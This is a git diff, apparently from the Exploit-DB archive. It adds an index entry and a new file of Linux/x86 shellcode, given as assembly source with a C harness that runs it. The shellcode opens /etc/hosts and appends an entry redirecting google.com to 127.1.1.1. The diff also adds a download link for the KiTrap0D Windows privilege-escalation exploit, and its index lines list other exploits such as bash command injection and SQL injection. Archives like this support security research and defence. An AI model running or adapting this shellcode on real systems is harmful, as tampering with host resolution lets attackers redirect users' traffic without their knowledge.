diff --git a/files.csv b/files.csv index 497694870..cd728932c 100755 --- a/files.csv +++ b/files.csv @@ -31318,6 +31318,7 @@ id,file,description,date,author,platform,type,port 34775,platforms/php/webapps/34775.txt,"Hotscripts Type PHP Clone Script index.php msg Parameter XSS",2009-08-21,Moudi,php,webapps,0 34776,platforms/php/webapps/34776.txt,"Hotscripts Type PHP Clone Script lostpassword.php msg Parameter XSS",2009-08-21,Moudi,php,webapps,0 34777,platforms/cgi/remote/34777.rb,"GNU bash Environment Variable Command Injection (MSF)",2014-09-25,"Shaun Colley",cgi,remote,0 +34778,platforms/lin_x86/shellcode/34778.c,"Linux/x86 Add map in /etc/hosts file",2014-09-25,"Javier Tejedor",lin_x86,shellcode,0 34779,platforms/hardware/webapps/34779.pl,"Nucom ADSL ADSLR5000UN ISP Credentials Disclosure",2014-09-25,"Sebastián Magof",hardware,webapps,80 34781,platforms/php/webapps/34781.txt,"Wordpress All In One WP Security Plugin 3.8.2 - SQL Injection",2014-09-25,"High-Tech Bridge SA",php,webapps,80 34782,platforms/php/webapps/34782.txt,"NetArt Media Car Portal 2.0 'car' Parameter SQL Injection Vulnerability",2010-09-27,RoAd_KiLlEr,php,webapps,0 diff --git a/platforms/lin_x86/shellcode/34778.c b/platforms/lin_x86/shellcode/34778.c new file mode 100755 index 000000000..c13e9c561 --- /dev/null +++ b/platforms/lin_x86/shellcode/34778.c @@ -0,0 +1,63 @@ +/** + +;modify_hosts.asm +;this program add a new entry in hosts file pointing google.com to 127.1.1.1 +;author Javier Tejedor +;date 24/09/2014 + +global _start + +section .text + +_start: + xor ecx, ecx + mul ecx + mov al, 0x5 + push ecx + push 0x7374736f ;/etc///hosts + push 0x682f2f2f + push 0x6374652f + mov ebx, esp + mov cx, 0x401 ;permmisions + int 0x80 ;syscall to open file + + xchg eax, ebx + push 0x4 + pop eax + jmp short _load_data ;jmp-call-pop technique to load the map + +_write: + pop ecx + push 20 ;length of the string, dont forget to modify if changes the map + pop edx + int 0x80 ;syscall to write in the file + + push 0x6 + pop eax + int 0x80 ;syscall to close the file + + push 0x1 + pop eax + int 0x80 ;syscall to exit + +_load_data: + call _write + google db "127.1.1.1 google.com" +**/ + +#include +#include + +unsigned char code[] = \ +"\x31\xc9\xf7\xe1\xb0\x05\x51\x68\x6f\x73\x74\x73\x68\x2f\x2f\x2f\x68\x68\x2f\x65\x74\x63\x89\xe3\x66\xb9\x01\x04\xcd\x80\x93\x6a\x04\x58\xeb\x10\x59\x6a\x14\x5a\xcd\x80\x6a\x06\x58\xcd\x80\x6a\x01\x58\xcd\x80\xe8\xeb\xff\xff\xff\x31\x32\x37\x2e\x31\x2e\x31\x2e\x31\x20\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d"; + +main() +{ + + printf("Shellcode Length: %d\n", strlen(code)); + + int (*ret)() = (int(*)())code; + + ret(); + +} diff --git a/platforms/windows/local/11199.txt b/platforms/windows/local/11199.txt index 95b1863a9..8cde03598 100755 --- a/platforms/windows/local/11199.txt +++ b/platforms/windows/local/11199.txt @@ -1,3 +1,5 @@ +Exploit-DB Mirror: http://www.exploit-db.com/sploits/KiTrap0D.zip + Microsoft Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack -------------------------------------------------------------------------